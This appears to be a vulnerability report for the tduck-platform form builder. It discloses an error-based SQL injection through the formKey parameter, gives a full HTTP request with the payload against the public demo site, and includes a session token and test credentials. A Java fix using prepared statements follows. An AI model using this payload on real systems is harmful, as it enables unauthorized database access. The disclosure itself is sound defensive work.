TDuckCloud/tduck-platform

[vulnerability] Back-office management statistics function SQL injection in FormDataMysqlService.java


1. Steps to reproduce

1. Use the official demo environment (https://demo.tduckapp.com/project) for verification and register a user through the registration function (1b7pl_dp@linshiyouxiang.net/123456).


2. Log in and construct the following request, replacing the Token header with the login token of the registered user; the formKey parameter carries the malicious injection statement.

POST /user/form/data/query?timestamp=1702986363697&sign=d40296262a3e99f608de2a9d7e435658 HTTP/1.1
Host: demo.tduckapp.com
Cookie: Hm_lvt_4dbdbc5421c41984499f878628d60f2f=1702985656; Hm_lpvt_4dbdbc5421c41984499f878628d60f2f=1702985890
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:120.0) Gecko/20100101 Firefox/120.0
Accept: application/json, text/plain, */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Content-Type: application/json
Token: eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzUxMiJ9.eyJzdWIiOiIyMTMyMSIsImlhdCI6MTcwMjk4NTg0NCwiZXhwIjoxNzAzNTkwNjQ0fQ.illpxfzf2O1AeJ3Ra3AHLgRufKgL9_KK1MAwfu0_l9C7GxSJT_ta9cDipGVWEhMijrS79N3lAksz7DgUzlhwUg
Content-Length: 122
Origin: https://demo.tduckapp.com
Referer: https://demo.tduckapp.com/project/form/data?key=MVWB25aE&active=data&type=1
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Te: trailers
Connection: close

{"authGroupId":null,"formKey":"MVWB25aE' or updatexml(1,concat(0x7e,user(),0x7e),1)='1","filter":{},"size":10,"current":0}

3. A SQL error page is produced and the output of user() is echoed back, which confirms the vulnerability.


2. Source code analysis of the vulnerability

The corresponding search method in FormDataMysqlService.java applies no restriction to the formKey parameter received from the request and concatenates it directly into the SQL statement that is executed.

3. Affected version

This SQL injection affects the current latest version (v4.0).

4. Fix recommendations

Use prepared statements with bound parameters instead of string concatenation.
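The concatenation pattern described in the source analysis above, beside the prepared-statement fix this section recommends. This is an added illustration and not tduck-platform's own code: it assumes plain JDBC, a hypothetical table fm_form_data with a form_key column, and that current/size from the request are a page index and page size.

```java
// Added example, not the project's code. Table/column names and the
// paging interpretation (current = page index, size = page size) are assumptions.
import java.sql.Connection;
import java.sql.PreparedStatement;
import java.sql.ResultSet;
import java.sql.SQLException;
import java.sql.Statement;
import java.util.ArrayList;
import java.util.List;
import java.util.regex.Pattern;

public class FormDataQuery {

    // Vulnerable pattern from the report: formKey is spliced into the SQL text,
    // so a quote character in the parameter changes the statement's structure.
    static List<String> searchUnsafe(Connection conn, String formKey) throws SQLException {
        String sql = "SELECT original_data FROM fm_form_data WHERE form_key = '" + formKey + "'";
        try (Statement st = conn.createStatement(); ResultSet rs = st.executeQuery(sql)) {
            return collect(rs);
        }
    }

    // Hardened version: the value travels as a bound parameter, never as SQL text,
    // so the driver treats it as data regardless of quotes or keywords it contains.
    static List<String> searchSafe(Connection conn, String formKey, int size, int current) throws SQLException {
        String sql = "SELECT original_data FROM fm_form_data WHERE form_key = ? LIMIT ? OFFSET ?";
        try (PreparedStatement ps = conn.prepareStatement(sql)) {
            ps.setString(1, formKey);
            ps.setInt(2, size);
            ps.setInt(3, current * size);
            try (ResultSet rs = ps.executeQuery()) {
                return collect(rs);
            }
        }
    }

    // Defence in depth (assumed format): form keys in the report look like short
    // alphanumeric tokens such as MVWB25aE, so reject anything else up front.
    private static final Pattern FORM_KEY = Pattern.compile("^[A-Za-z0-9]{1,32}$");

    static boolean isValidFormKey(String formKey) {
        return formKey != null && FORM_KEY.matcher(formKey).matches();
    }

    private static List<String> collect(ResultSet rs) throws SQLException {
        List<String> rows = new ArrayList<>();
        while (rs.next()) rows.add(rs.getString(1));
        return rows;
    }
}
```

With the injected value from step 2, isValidFormKey returns false and searchSafe would in any case look for a literal form_key equal to the whole string rather than executing updatexml().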